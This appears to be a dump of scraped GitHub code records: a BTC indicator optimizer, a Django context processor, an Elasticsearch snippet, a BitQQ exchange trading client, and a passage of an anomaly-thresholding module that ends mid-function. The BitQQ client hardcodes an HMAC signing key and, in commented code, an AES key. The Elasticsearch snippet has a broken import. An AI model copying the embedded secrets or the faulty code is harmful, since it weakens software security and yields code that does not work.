+{"seq_id":"28531364937","text":"'''\nThis file uses the class `TechnicalIndicatorOptimizer`\nthat I created to optimize the technical indicators\nand build a dashboard to compare the results of the different indicators\nThis is a very slow process and will take a long time to run.\nI'm sure there is a LOT of room for improvement here.\n'''\n\nfrom ta_optimizer import TechnicalIndicatorOptimizer\nimport logging\nimport os\nimport pandas_ta as ta\nimport pandas as pd\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# Load data into a Pandas DataFrame\ndf = pd.read_csv('data/btc.csv', parse_dates=True, index_col=0)\nmodel_store = 'models/'\nos.makedirs(model_store, exist_ok=True) # create the models directory if it doesn't exist\n\n\n# SMA\nlogging.info(\"Optimizing SMA\")\nsma_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.sma, \n \"sma\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nsma_best_result = sma_optimizer.optimize()\nprint(\"SMA Best Result:\", sma_best_result)\n\n# EMA\nlogging.info(\"Optimizing EMA\")\nema_optimizer = TechnicalIndicatorOptimizer(\n df, \n ta.ema, \n \"ema\", \n \"length\", \n [5, 10, 20, 50, 100], \n [5, 30, 60, 90, 120]\n)\nema_best_result = ema_optimizer.optimize()\nprint(\"EMA Best Result:\", ema_best_result)\n\n# Stochastic\nlogging.info(\"Optimizing Stochastic\")\nstoch_optimizer = TechnicalIndicatorOptimizer(\n df,\n None,\n \"stoch\",\n [\"k_period\", \"d_period\"],\n [(5, 3), (14, 3), (14, 5)],\n [5, 30, 60, 90, 120],\n indicator_type='stochastic'\n)\nstoch_best_result = stoch_optimizer.optimize()\nprint(\"Stochastic Best Result:\", stoch_best_result)\n\n# Plot the analysis results for the two different moving average indicators\nsma_results = [sma_optimizer.evaluate_indicator_param(param_value) for param_value in sma_optimizer.param_values]\nema_results = [ema_optimizer.evaluate_indicator_param(param_value) for param_value in ema_optimizer.param_values]\n# Generate the analysis results for the different Stochastic parameter values\nstoch_results = [stoch_optimizer.evaluate_indicator_param(param_value) for param_value in stoch_optimizer.param_values]\n\n\nlogging.info(\"Plotting SMA Analysis Dashboard\")\nsma_optimizer.plot_analysis_dashboard(\n sma_results, title='SMA Optimization Dashboard')\nlogging.info(\"Plotting EMA Analysis Dashboard\")\nema_optimizer.plot_analysis_dashboard(\n ema_results, title='EMA Optimization Dashboard')\nlogging.info(\"Plotting Stochastic Analysis Dashboard\")\nstoch_optimizer.plot_analysis_dashboard(\n stoch_results, title='Stochastic Optimization Dashboard')\n","repo_name":"eervin123/feature-engineering","sub_path":"random-forest/run_optimizer.py","file_name":"run_optimizer.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"21789904665","text":"import datetime\nfrom database.models import Module, MetaData, Student\nfrom database.views import is_admin\nfrom django.contrib.auth.models import Group\nfrom django.template import Context, RequestContext\nfrom database.views import is_teacher, is_student, is_admin\n\n\ndef menubar(request):\n admin = False\n inactive = False\n alumni = False\n unassigned = False\n user_is_student = False\n if is_teacher(request.user) or is_admin(request.user):\n future = []\n past = []\n current = []\n meta = MetaData.objects.get(data_id=1)\n current_year = meta.current_year\n all_modules = Module.objects.all()\n for module in all_modules:\n if (request.user in module.instructors.all() or\n is_admin(request.user)):\n if module.year == current_year:\n current.append(module)\n elif module.year > current_year:\n future.append(module)\n elif module.year < current_year:\n past.append(module)\n current.sort(key=lambda x: x.title)\n future.sort(key=lambda x: x.title)\n past.sort(key=lambda x: x.title)\n if is_admin(request.user):\n admin = True\n# admins = Group.objects.get(name=\"admins\").user_set.all()\n# if request.user in admins:\n# admin = True\n# else:\n# admin = False\n inactive_students = Student.objects.filter(active=False)\n if len(inactive_students) > 0:\n if admin:\n inactive = True\n alumni_students = Student.objects.filter(year=9)\n if len(alumni_students) > 0:\n alumni = True\n not_assigned = Student.objects.filter(year=None)\n if len(not_assigned) > 0:\n unassigned = True\n module_dict = {'current': current, 'past': past, 'future': future}\n else: # Student View\n module_dict = {}\n user_is_student = True\n return {\n 'module_dict': module_dict,\n 'admin': admin,\n 'inactive': inactive,\n 'alumni': alumni,\n 'unassigned': unassigned,\n 'user_is_student': user_is_student\n }\n","repo_name":"tobi2006/mysds","sub_path":"database/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"27808776978","text":"from elasticsearch import E\n\nes=Elasticsearch()\n# 添加数据\nes.index(index=\"my_index\",doc_type=\"test_type\",id=1,body={\"name\":\"python\",\"addr\":\"深圳\"})\n# 查询数据\nresult = es.search(index=\"my_index\",doc_type=\"test_type\")\n# 打印所有数据\nfor item in result[\"hits\"][\"hits\"]:\n print(item[\"_source\"])\n","repo_name":"hua1054921935/TeacherManager","sub_path":"elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72122179950","text":"# encoding: utf-8\nimport json\nimport time\nimport hmac\nimport copy\nimport binascii\nimport asyncio\nfrom urllib.parse import urljoin, quote\nimport hashlib\n\nfrom quant import const\nfrom quant.error import Error\nfrom quant.utils import logger\nfrom quant.const import BITQQ\nfrom quant.order import Order\nfrom quant.tasks import SingleTask, LoopRunTask\nfrom quant.asset import Asset, AssetSubscribe\nfrom quant.utils.http_client import AsyncHttpRequests\nfrom quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL\nfrom quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET\nfrom quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \\\n ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED, ORDER_STATUS_PENDING_CANCEL\nfrom base64 import b64encode\nfrom Crypto.Cipher import AES\n\n__all__ = (\"BitQQRestAPI\", \"BitQQTrade\")\n\n\ndef convert_md5(origin):\n result = []\n s = \"\"\n for i in range(len(origin)):\n s += origin[i]\n if i % 2 != 0:\n int_hex = int(s, 16)\n result.append(int_hex)\n s = \"\"\n\n return result\n\n\ndef encryption_md5_buy_key(data):\n key = 'T5xJUNDA6hzxBuuwx8arhsDxCNGbO7iL'\n encode_data1 = data.encode()\n result1 = hmac.new(key.encode(), encode_data1, digestmod='MD5').hexdigest()\n last_result = convert_md5(result1)\n l_result = bytearray(last_result)\n lll_result = b64encode(l_result)\n return lll_result.decode()\n\n\nclass AESCipher:\n \"\"\"AES ECB 128位加密\"\"\"\n\n def __init__(self, key, BLOCK_SIZE):\n self.key = key\n self.BLOCK_SIZE = BLOCK_SIZE\n\n def pad(self, s):\n return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)\n\n def unpad(self, s):\n return s[:-ord(s[len(s) - 1:])]\n\n def encrypt(self, raw):\n raw = self.pad(raw)\n cipher = AES.new(self.key, AES.MODE_ECB)\n ret = cipher.encrypt(raw.encode()) # 加密pwd原文得到秘文pwd\n return ret.hex() # 将秘文转换为16进制\n\n def decrypt(self, enc):\n enc = binascii.unhexlify(enc)\n cipher = AES.new(self.key, AES.MODE_ECB)\n return self.unpad(cipher.decrypt(enc)).decode('utf8')\n\n\nclass BitQQRestAPI:\n\n def __init__(self, host, access_key, secret_key, passphrase, order_module_host=None):\n \"\"\"因暂时未开放api,则access代表账号, secret代表密码\"\"\"\n self._host = host\n self._order_module_host = order_module_host\n self._access_key = access_key\n self.secret_key = secret_key\n self.passphrase = passphrase # 账号id\n # self.token = None\n # SingleTask.run(self.login)\n # LoopRunTask.register(self.login, interval=60 * 60)\n\n async def get_spot_accounts(self):\n uri = 'api/userfund/list'\n success, error = await self.request('GET', uri, auth=True)\n # print(success, error)\n return success, error\n\n # async def login(self, *args, **kwargs):\n # t = int(time.time() * 1000)\n # key = \"mN4Yn8Or8r7SH1w4VnpS5lMS\"\n # BLOCK_SIZE = 16 # Bytes\n # md = hashlib.md5()\n # md.update(key.encode())\n #\n # ret = md.hexdigest() # 将密钥进行md5加密并获取加密后的密文\n # ret_16bit = convert_md5(ret) # 将密文转换为16位的数组\n # bytess = bytearray(ret_16bit) # 将数组转换为bytearray\n #\n # aes = AESCipher(bytess, BLOCK_SIZE)\n # en = aes.encrypt(self.secret_key) # 加密pwd\n # ss = self.secret_key + str(t) + en\n # sign = encryption_md5_buy_key(ss) # 生成签名\n #\n # uri = 'api/user/login'\n #\n # sign = sign.replace('+', '%2B')\n #\n # params = {\n # 'userAccount': self._access_key,\n # 'password': en,\n # 'device': 'oNrTBq4u3gP9G0ns2SoKypG9X',\n # 'loginTime': t,\n # 'sign': sign,\n # 'type': 2\n # }\n # while True:\n # success, error = await self.request('POST', uri, 
params=params, auth=False)\n # if success:\n # if success['state'] == 0:\n # self.token = success['token']\n # logger.info('登录成功', self.token)\n # else:\n # self.token = None\n # else:\n # self.token = None\n # logger.error('登录失败', error)\n # if self.token:\n # break\n # asyncio.sleep(2)\n\n async def create_order(self, action, symbol, price, quantity, *args):\n \"\"\"\n\n :param action:\n :param symbol: 交易对符号 例 eos_usdt\n :param price: 价格,float\n :param quantity: 交易量 float\n :param order_type:\n :param account_type: 1、币币 2、杠杆\n :return:\n \"\"\"\n uri = 'coin/entrust/robot/order'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/order'\n is_order_module = True\n params = {\n 'type': \"buy\" if action == ORDER_ACTION_BUY else \"sell\",\n 'amount': quantity,\n 'price': price,\n 'symbol': symbol,\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_order(self, order_no):\n uri = 'coin/entrust/revoke'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/revoke'\n is_order_module = True\n\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_orders(self, *order_ids):\n uri = 'coin/entrust/robot/batchOrder'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/batchOrder'\n is_order_module = True\n\n order_ids_str = [str(id) for id in order_ids]\n if len(order_ids_str) > 12:\n order_ids_str = order_ids_str[:12]\n params = {\n 'orderIds': ','.join(order_ids_str)\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_user_account(self):\n url = 'api/userfund/list'\n success, error = await self.request('GET', uri=url, auth=True)\n return success, error\n\n async def get_order_info(self, order_no):\n uri = 'coin/user/robot/orderDetail'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/orderDetail'\n is_order_module = True\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_order_list(self, symbol):\n uri = 'coin/user/robot/currOrderList'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/currOrderList'\n is_order_module = True\n params = {\n 'symbol': symbol,\n 'module': 1,\n 'page': 0,\n 'limit': 999\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n return success, error\n\n async def get_kline(self, symbol, kline_type=const.MARKET_TYPE_KLINE, start=None, limit=20):\n uri = 'public/market/kline'\n params = {\n 'symbol': symbol,\n 'page': 1,\n 'limit': limit\n }\n if kline_type == const.MARKET_TYPE_KLINE:\n params['timeType'] = 1\n elif kline_type == const.MARKET_TYPE_KLINE_5M:\n params['timeType'] = 2\n elif kline_type == const.MARKET_TYPE_KLINE_15M:\n params['timeType'] = 3\n elif kline_type == const.MARKET_TYPE_KLINE_30M:\n params['timeType'] = 4\n elif kline_type == const.MARKET_TYPE_KLINE_1H:\n params['timeType'] = 5\n elif kline_type == const.MARKET_TYPE_KLINE_24H:\n params['timeType'] = 6\n\n success, error = await self.request('POST', uri=uri, params=params)\n if success:\n kline_list = list()\n 
klines = success['data']['list']\n for kline in klines:\n ts_str = kline['createDate']\n ts = int(time.mktime(time.strptime(ts_str, '%Y-%m-%d %H:%M:%S'))) * 1000\n kline['createDate'] = ts\n if ts >= start:\n kline_list.append(kline)\n if len(kline_list) > limit:\n return kline_list[0:limit], None\n else:\n return kline_list\n else:\n return success, error\n\n async def get_latest_price(self, symbol):\n \"\"\"获取最新成交价\"\"\"\n uri = '/public/market/lastOrder'\n params = {\n 'symbol': symbol,\n 'limit': 1\n }\n\n success, error = await self.request('POST', uri=uri, params=params)\n return success, error\n\n async def request(self, method, uri, params=None, body=None, auth=False, is_order_module=False):\n \"\"\" 发起请求\n @param method 请求方法 GET / POST / DELETE / PUT\n @param uri 请求uri\n @param params dict 请求query参数\n @param body dict 请求body数据\n @param headers 请求http头\n @param auth boolean 是否需要加入权限校验\n @:return: 请求成功success为返回数据,error为None,请求失败,success为None,error为报错信息\n \"\"\"\n # 增加签名\n if auth:\n if params is None:\n params = dict()\n\n params['userId'] = self.passphrase\n\n if params:\n query = \"&\".join([\"{}={}\".format(k, params[k]) for k in sorted(params.keys())])\n uri += '?' + query\n url = urljoin(self._host, uri)\n if self._order_module_host and is_order_module:\n url = urljoin(self._order_module_host, uri)\n\n headers = {\n 'Content-Type': 'application/json'\n }\n _, success, error = await AsyncHttpRequests.fetch(method, url, body=body, headers=headers, timeout=30)\n # print('原始结果:', success, error)\n logger.debug(url)\n if success:\n try:\n if isinstance(success, str):\n success = json.loads(success)\n if success.get('status') != 0 or success.get('msg') != 'success':\n return None, success\n except Exception as e:\n return None, e\n\n return success, error\n\n\nclass BitQQTrade:\n\n def __init__(self, **kwargs):\n \"\"\"\n 初始化\n \"\"\"\n e = None\n if not kwargs.get(\"account\"):\n e = Error(\"param account miss\")\n if not kwargs.get(\"strategy\"):\n e = Error(\"param strategy miss\")\n if not kwargs.get(\"symbol\"):\n e = Error(\"param symbol miss\")\n if not kwargs.get(\"host\"):\n kwargs[\"host\"] = \"http://dev.api.bitqq.vip:81\"\n if not kwargs.get(\"wss\"):\n kwargs['wss'] = 'wss://dev.websocket.bitqq.vip:9094'\n if not kwargs.get(\"access_key\"):\n e = Error(\"param access_key miss\")\n if not kwargs.get(\"secret_key\"):\n e = Error(\"param secret_key miss\")\n if not kwargs.get(\"passphrase\"):\n e = Error(\"param passphrase miss\")\n if e:\n logger.error(e, caller=self)\n if kwargs.get(\"init_success_callback\"):\n SingleTask.run(kwargs[\"init_success_callback\"], False, e)\n return\n\n self._account = kwargs[\"account\"]\n self._strategy = kwargs[\"strategy\"]\n self._platform = BITQQ\n self._symbol = kwargs[\"symbol\"]\n self._host = kwargs[\"host\"]\n self._order_module_host = kwargs.get('order_module_host')\n self._access_key = kwargs[\"access_key\"]\n self._secret_key = kwargs[\"secret_key\"]\n self._passphrase = kwargs[\"passphrase\"]\n self._asset_update_callback = kwargs.get(\"asset_update_callback\")\n self._order_update_callback = kwargs.get(\"order_update_callback\")\n self._position_update_callback = kwargs.get(\"position_update_callback\")\n self._init_success_callback = kwargs.get(\"init_success_callback\")\n self._contract_update_callback = kwargs.get('contract_update_callback')\n\n # 初始化 REST API 对象\n self._rest_api = BitQQRestAPI(self._host, self._access_key, self._secret_key, self._passphrase, order_module_host=self._order_module_host)\n\n if 
self._asset_update_callback:\n AssetSubscribe(self._platform, self._account, self.on_event_asset_update)\n\n SingleTask.call_later(self.reset_order_list, delay=10)\n\n @property\n def rest_api(self):\n return self._rest_api\n\n async def on_event_asset_update(self, asset: Asset):\n \"\"\"资产数据更新回调\"\"\"\n self._assets = asset\n SingleTask.run(self._asset_update_callback, asset)\n\n async def reset_order_list(self):\n # 撤销当前账号所有\n success, error = await self.revoke_all_order()\n if error:\n logger.error('撤销所有订单失败, error: ', error)\n SingleTask.call_later(self.reset_order_list, delay=1)\n else:\n if self._init_success_callback:\n SingleTask.run(self._init_success_callback, True, None)\n\n async def get_latest_price(self, symbol=None):\n if symbol is None:\n symbol = self._symbol\n success, error = await self._rest_api.get_latest_price(symbol)\n if success:\n if len(success['data']) > 0:\n success = success['data'][0]['price']\n else:\n success = None\n return success, error\n\n async def revoke_order(self, *order_nos):\n if len(order_nos) == 0:\n return [], Error('订单号传参错误')\n else:\n # 批量撤单\n result, error = await self._rest_api.revoke_orders(*order_nos)\n if error:\n for id in order_nos:\n await self.get_order_info(id)\n await asyncio.sleep(0.05)\n return [], error\n else:\n revoked_orders = result.get('data', [])\n # logger.info('批量撤单结果:', revoked_orders)\n for id in order_nos:\n if id not in revoked_orders:\n await self.get_order_info(id)\n await asyncio.sleep(0.05)\n return revoked_orders, None\n\n async def create_order(self, action, price, quantity, *args):\n result, error = await self._rest_api.create_order(action, self._symbol, price, quantity)\n if error:\n return None, error\n else:\n return result.get('data'), None\n\n def _update_order(self, order_info=None, s_order_id=None):\n \"\"\" 更新订单信息\n \"\"\"\n order = None\n if order_info:\n logger.debug('查询订单信息, order: ', order_info)\n order_no = str(order_info['id'])\n state = str(order_info[\"status\"])\n remain = float(order_info[\"surplusCount\"])\n utime = order_info[\"updateTime\"]\n ctime = order_info[\"createDate\"]\n action = ORDER_ACTION_BUY if str(order_info['orderType']) == \"1\" else ORDER_ACTION_SELL\n\n if state == \"5\":\n status = ORDER_STATUS_CANCELED\n elif state == \"2\":\n status = ORDER_STATUS_PARTIAL_FILLED\n elif state == \"3\":\n status = ORDER_STATUS_FILLED\n elif state == \"4\":\n status = ORDER_STATUS_PENDING_CANCEL\n else:\n status = ORDER_STATUS_SUBMITTED\n\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": order_no,\n \"action\": action,\n \"symbol\": order_info['symbol'],\n \"price\": order_info[\"putPrice\"],\n \"quantity\": order_info[\"count\"],\n }\n order = Order(**info)\n\n if order_info.get('dealPrice') is None:\n avg_price = 0.0\n else:\n avg_price = float(order_info.get('dealPrice'))\n\n order.remain = remain\n order.status = status\n order.avg_price = avg_price\n order.ctime = ctime\n order.utime = utime\n\n if s_order_id:\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": str(s_order_id),\n \"symbol\": self._symbol,\n }\n order = Order(**info)\n order.status = ORDER_STATUS_CANCELED\n\n if order and self._order_update_callback:\n SingleTask.run(self._order_update_callback, copy.copy(order))\n\n return order\n\n async def revoke_all_order(self):\n\n data, error = await self._rest_api.get_order_list(self._symbol)\n if error:\n return None, error\n\n else:\n 
open_order_ids = [item['id'] for item in data['data']['list']]\n if len(open_order_ids) == 0:\n return [], None\n result, error = await self._rest_api.revoke_orders(*open_order_ids)\n if error:\n return None, error\n else:\n revoked_order_ids = result.get('data', [])\n if revoked_order_ids == open_order_ids:\n return [], None\n else:\n unrevoked_num = len(open_order_ids) - len(revoked_order_ids)\n if unrevoked_num > 0:\n unrevoked_orders = [id for id in open_order_ids if id not in revoked_order_ids]\n return None, Error('还剩余{}个订单等待撤销,订单号为 {}'.format(unrevoked_num, unrevoked_orders))\n else:\n return [], None\n\n async def get_order_info(self, order_no):\n order_info, error = await self._rest_api.get_order_info(order_no)\n\n if error:\n if error:\n logger.debug('查询订单详情失败,订单id: {}, error:{}'.format(order_no, error))\n if isinstance(error, dict) and error.get('state') == 2500:\n logger.debug('订单已被数据库删除, id:', order_no)\n order = self._update_order(s_order_id=order_no)\n return copy.copy(order), None\n return None, error\n else:\n order = self._update_order(order_info['data'])\n return copy.copy(order), None\n","repo_name":"galendu/nextquant_inner","sub_path":"quant/platform/bitqq.py","file_name":"bitqq.py","file_ext":"py","file_size_in_byte":19167,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"73774371949","text":"\n# The below functions were taken from NASA JPL's 'telenanom' project that proposed the idea of nonparametric dynamic \n# thresholding. \n# The functions have been slightly modified for this project. I've made a few more parameters adjustable like p from\n# the detect_anomalies function for better testing\n\n# Standard modules\nimport progressbar\nfrom matplotlib import pyplot\nimport numpy as np\nimport math\nimport pandas as pd\nfrom itertools import groupby\nfrom operator import itemgetter\nimport more_itertools as mit\nfrom elasticsearch import Elasticsearch\nimport time\nimport json\nimport sys\nimport os\nimport math\nfrom scipy.stats import norm\n\noriginal_author = 'Peter Schneider'\nmod_by = 'Isaac Burmingham'\n\n\n# number of values to evaluate in each batch\nbatch_size = 70\n# number of trailing batches to use in error calculation\nwindow_size = 30\n# determines window size used in EWMA smoothing (percentage of total values for channel)\nsmoothing_perc = 0.05\n# num previous timesteps provided to model to predict future values\nl_s = 250\n# number of values surrounding an error that are brought into the sequence (promotes grouping on nearby sequences\nerror_buffer = 100\n# minimum percent decrease between max errors in anomalous sequences (used for pruning)\np = 0.35\n\n\ndef get_errors(y_test, y_hat, batch_size=70, window_size=30,smoothing_perc=0.05, anom=None, smoothed=True):\n \"\"\"Calculate the difference between predicted telemetry values and actual values, then smooth residuals using\n ewma to encourage identification of sustained errors/anomalies.\n\n Inputs:\n y_test (np array): array of test targets corresponding to true values to be predicted at end of each sequence\n y_hat (np array): predicted test values for each timestep in y_test\n anom (dict): contains anomaly information for a given input stream\n smoothed (bool): If False, return unsmooothed errors (used for assessing quality of predictions)\n\n\n Outputs:\n e (list): unsmoothed errors (residuals)\n e_s (list): smoothed errors (residuals)\n \"\"\"\n\n # e = [abs(y_h - y_t[0]) for y_h, y_t in zip(y_hat, y_test)]\n e = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_test)]\n\n if not smoothed:\n return e\n\n smoothing_window = int(batch_size * window_size * smoothing_perc)\n if not len(y_hat) == len(y_test):\n raise ValueError(\n \"len(y_hat) != len(y_test), can't calculate error: %s (y_hat) , %s (y_test)\" % (len(y_hat), len(y_test)))\n\n e_s = list(pd.DataFrame(e).ewm(span=smoothing_window).mean().values.flatten())\n\n # for values at beginning < sequence length, just use avg\n if anom is None:\n e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n elif not anom['chan_id'] == 'C-2': # anom occurs early in window (limited data available for channel)\n e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n\n # np.save(os.path.join(\"data\", anom['run_id'], \"smoothed_errors\", anom[\"chan_id\"] + \".npy\"), np.array(e_s))\n\n return e_s\n\n\ndef process_errors(y_test, e_s, window_size = 30, batch_size=70, p=0.25):\n '''Using windows of historical errors (h = batch size * window size), calculate the anomaly\n threshold (epsilon) and group any anomalous error values into continuos sequences. 
Calculate\n    score for each sequence using the max distance from epsilon.\n\n    Args:\n        y_test (np array): test targets corresponding to true telemetry values at each timestep t\n        e_s (list): smoothed errors (residuals) between y_test and y_hat\n    \n    Optional:\n        window_size: Sets the window size\n\n    Returns:\n        E_seq (list of tuples): Start and end indices for each anomalous sequence\n        anom_scores (list): Score for each anomalous sequence\n    '''\n\n    i_anom = []  # anomaly indices\n\n    num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n\n    # decrease the historical error window size (h) if number of test values is limited\n    while num_windows < 0:\n        window_size -= 1\n        if window_size <= 0:\n            window_size = 1\n        num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n        if window_size == 1 and num_windows < 0:\n            raise ValueError(\"Batch_size (%s) larger than y_test (len=%s). Adjust batch_size.\" % (\n                batch_size, y_test.shape[0]))\n\n    # Identify anomalies for each new batch of values\n    for i in range(1, num_windows + 2):\n        prior_idx = (i - 1) * (batch_size)\n        idx = (window_size * batch_size) + ((i - 1) * batch_size)\n\n        if i == num_windows + 1:\n            idx = y_test.shape[0]\n\n        window_e_s = e_s[prior_idx:idx]\n        window_y_test = y_test[prior_idx:idx]\n\n        epsilon = find_epsilon(window_e_s, error_buffer)\n        window_anom_indices = get_anomalies(window_e_s, window_y_test, epsilon, i - 1, i_anom, len(y_test), p)\n\n        # update indices to reflect true indices in full set of values (not just window)\n        i_anom.extend([i_a + (i - 1) * batch_size for i_a in window_anom_indices])\n\n    # group anomalous indices into continuous sequences\n    i_anom = sorted(list(set(i_anom)))\n    groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n    E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n    # calc anomaly scores based on max distance from epsilon for each sequence\n    anom_scores = []\n    for e_seq in E_seq:\n        score = max([abs(e_s[x] - epsilon) / (np.mean(e_s) + np.std(e_s)) for x in range(e_seq[0], e_seq[1])])\n        anom_scores.append(score)\n\n    return E_seq, anom_scores\n\n\ndef find_epsilon(e_s, error_buffer, sd_lim=12.0):\n    '''Find the anomaly threshold that maximizes a function representing the tradeoff between a) number of anomalies\n    and anomalous ranges and b) the reduction in mean and st dev if anomalous points are removed from errors\n    (see https://arxiv.org/pdf/1802.04431.pdf)\n\n    Args:\n        e_s (array): residuals between y_test and y_hat values (smoothed using ewma)\n        error_buffer (int): if an anomaly is detected at a point, this is the number of surrounding values\n            to add to the anomalous range. 
This promotes grouping of nearby sequences and more intuitive results\n        sd_lim (float): The max number of standard deviations above the mean to calculate as part of the\n            argmax function\n\n    Returns:\n        sd_threshold (float): the calculated anomaly threshold in number of standard deviations above the mean\n    '''\n\n    mean = np.mean(e_s)\n    sd = np.std(e_s)\n\n    max_s = 0\n    sd_threshold = sd_lim  # default if no winner or too many anomalous ranges\n\n    # it is possible for sd to be 0; avoid divide by zero error\n    if sd == 0:\n        return sd_threshold\n\n    for z in np.arange(2.5, sd_lim, 0.5):\n        epsilon = mean + (sd * z)\n        pruned_e_s, pruned_i, i_anom = [], [], []\n\n        for i, e in enumerate(e_s):\n            if e < epsilon:\n                pruned_e_s.append(e)\n                pruned_i.append(i)\n            if e > epsilon:\n                for j in range(0, error_buffer):\n                    if not i + j in i_anom and not i + j >= len(e_s):\n                        i_anom.append(i + j)\n                    if not i - j in i_anom and not i - j < 0:\n                        i_anom.append(i - j)\n\n        if len(i_anom) > 0:\n            # preliminarily group anomalous indices into continuous sequences (# sequences needed for scoring)\n            i_anom = sorted(list(set(i_anom)))\n            groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n            E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n            perc_removed = 1.0 - (float(len(pruned_e_s)) / float(len(e_s)))\n            mean_perc_decrease = (mean - np.mean(pruned_e_s)) / mean\n            sd_perc_decrease = (sd - np.std(pruned_e_s)) / sd\n            s = (mean_perc_decrease + sd_perc_decrease) / (len(E_seq) ** 2 + len(i_anom))\n\n            # sanity checks\n            if s >= max_s and len(E_seq) <= 5 and len(i_anom) < (len(e_s) * 0.5):\n                sd_threshold = z\n                max_s = s\n\n    return sd_threshold  # multiply by sd to get epsilon\n\n\ndef compare_to_epsilon(e_s, epsilon, len_y_test, inter_range, chan_std,\n                       std, error_buffer, window, i_anom_full):\n    '''Compare smoothed error values to epsilon (error threshold) and group consecutive errors together into\n    sequences.\n\n    Args:\n        e_s (list): smoothed errors between y_test and y_hat values\n        epsilon (float): Threshold for errors above which an error is considered anomalous\n        len_y_test (int): number of timesteps t in test data\n        inter_range (tuple of floats): range between 5th and 95 percentile values of error values\n        chan_std (float): standard deviation on test values\n        std (float): standard deviation of smoothed errors\n        error_buffer (int): number of values surrounding anomalous errors to be included in anomalous sequence\n        window (int): Count of number of error windows that have been processed\n        i_anom_full (list): list of all previously identified anomalies in test set\n\n    Returns:\n        E_seq (list of tuples): contains start and end indices of anomalous ranges\n        i_anom (list): indices of errors that are part of an anomalous sequence\n        non_anom_max (float): highest smoothed error value below epsilon\n    '''\n\n    i_anom = []\n    E_seq = []\n    non_anom_max = 0\n\n    # Don't consider anything in window because scale of errors too small compared to scale of values\n    if not (std > (.05 * chan_std) or max(e_s) > (.05 * inter_range)) or not max(e_s) > 0.05:\n        return E_seq, i_anom, non_anom_max\n\n    # ignore initial error values until enough history for smoothing, prediction, comparisons\n    num_to_ignore = l_s * 2\n    # if y_test is small, ignore fewer\n    if len_y_test < 2500:\n        num_to_ignore = l_s\n    if len_y_test < 1800:\n        num_to_ignore = 0\n\n    for x in range(0, len(e_s)):\n\n        anom = True\n        if not e_s[x] > epsilon or not e_s[x] > 0.05 * inter_range:\n            anom = False\n\n        if anom:\n            for b in range(0, error_buffer):\n                if not x + b in i_anom and not 
x + b >= len(e_s) and (\n                        (x + b) >= len(e_s) - batch_size or window == 0):\n                    if not (window == 0 and x + b < num_to_ignore):\n                        i_anom.append(x + b)\n                # only considering new batch of values added to window, not full window\n                if not x - b in i_anom and ((x - b) >= len(e_s) - batch_size or window == 0):\n                    if not (window == 0 and x - b < num_to_ignore):\n                        i_anom.append(x - b)\n\n    # capture max of values below the threshold that weren't previously identified as anomalies\n    # (used in filtering process)\n    for x in range(0, len(e_s)):\n        adjusted_x = x + window * batch_size\n        if e_s[x] > non_anom_max and not adjusted_x in i_anom_full and not x in i_anom:\n            non_anom_max = e_s[x]\n\n    # group anomalous indices into continuous sequences\n    i_anom = sorted(list(set(i_anom)))\n    groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n    E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n    return E_seq, i_anom, non_anom_max\n\n\ndef prune_anoms(E_seq, e_s, non_anom_max, i_anom, p=0.25):\n    '''Remove anomalies that don't meet minimum separation from the next closest anomaly or error value\n\n    Args:\n        E_seq (list of lists): contains start and end indices of anomalous ranges\n        e_s (list): smoothed errors between y_test and y_hat values\n        non_anom_max (float): highest smoothed error value below epsilon\n        i_anom (list): indices of errors that are part of an anomalous sequence\n        p (float): minimum percent decrease\n    Returns:\n        i_pruned (list): remaining indices of errors that are part of anomalous sequences\n            after the pruning procedure\n    '''\n\n    E_seq_max, e_s_max = [], 